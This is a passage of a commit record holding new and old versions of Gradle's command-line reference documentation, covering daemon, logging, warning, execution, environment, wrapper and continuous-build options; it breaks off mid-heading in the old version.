`--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nAllows Gradle to re-use information about the file system in the next build.\n_Default is off_.\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if not running or existing daemon busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output as with `rich`, but also output task names and outcomes at the lifecycle log level, as was done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.
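\n\nFor example, to log every warning and fail the build if any are present (using the `fail` mode described above):\n\n----\n$ gradle build --warning-mode=fail\n----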
\n\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`; see the example after this list.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!
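\n\nFor example, to update the lock state for a single module while building (the module coordinates below are illustrative):\n\n----\n$ gradle classes --update-locks org.apache.commons:commons-lang3\n----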
\n\n== Environment options\nYou can customize many aspects of where Gradle looks for build scripts and settings, and where it stores caches and other files, through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create new Gradle builds, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.
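\n\nFor example, combining the documented options to pin the wrapper to a specific version with the `all` distribution (which also contains sources and documentation):\n\n----\n$ gradle wrapper --gradle-version=4.4 --distribution-type=all\n----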
\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (On Microsoft Windows, it is required to also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== Limitations and quirks\n\nThere are several issues to be aware of with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. If every time the task executes, the inputs are modified again, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input. In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating system specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (like on Linux\/Mac OS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic links to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. This means that changes to task configuration, or any other change to the build model, are effectively ignored.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle.
The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can run a task and all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,dependencies>>.\n----\n$ gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\n\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n$ gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks. 
For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. 
For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. 
You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command-line options, and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output are available in <<viewing_debugging_dependencies.adoc#,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualizes the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match the specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. 
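This is achieved with the optional `--configuration` parameter. For example, the following restricts the insight report to a single configuration (the dependency and configuration names here are illustrative, assuming a Java project):\n\n----\n$ gradle dependencyInsight --dependency commons-lang3 --configuration compileClasspath\n----\n\n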
[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n=== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model.adoc#software_model,software model>> projects using the `model` task:\n\n----\n$ gradle model\n----\n\nLearn more about <<software_model.adoc#model-report,the model report>> in the software model documentation.\n\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrints the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrints the stacktrace also for user exceptions (e.g. a compile error). See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreates a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebugs the Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebugs the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving the performance of Gradle builds].\n\nMany of these options can be specified in `gradle.properties`, so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_builds.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets the maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuilds projects in parallel. For limitations of this option, see <<multi_project_builds.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. 
`--scan` is preferred.\n\n`--scan`::\nGenerates a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nAllows Gradle to re-use information about the file system in the next build.\n_Default is off_.\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command-line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if it is not running or if the existing daemon is busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nThe Gradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. The different modes are described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like `rich`, but with task names and outcomes logged at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). 
Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. The different modes are described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which tasks would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!\n\n== Environment options\nYou can customize where build scripts, settings, caches, and so on are located through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. 
The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to the current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSets JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSets the JDK home directory.\n\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create new Gradle builds, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (on Microsoft Windows, you must also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== 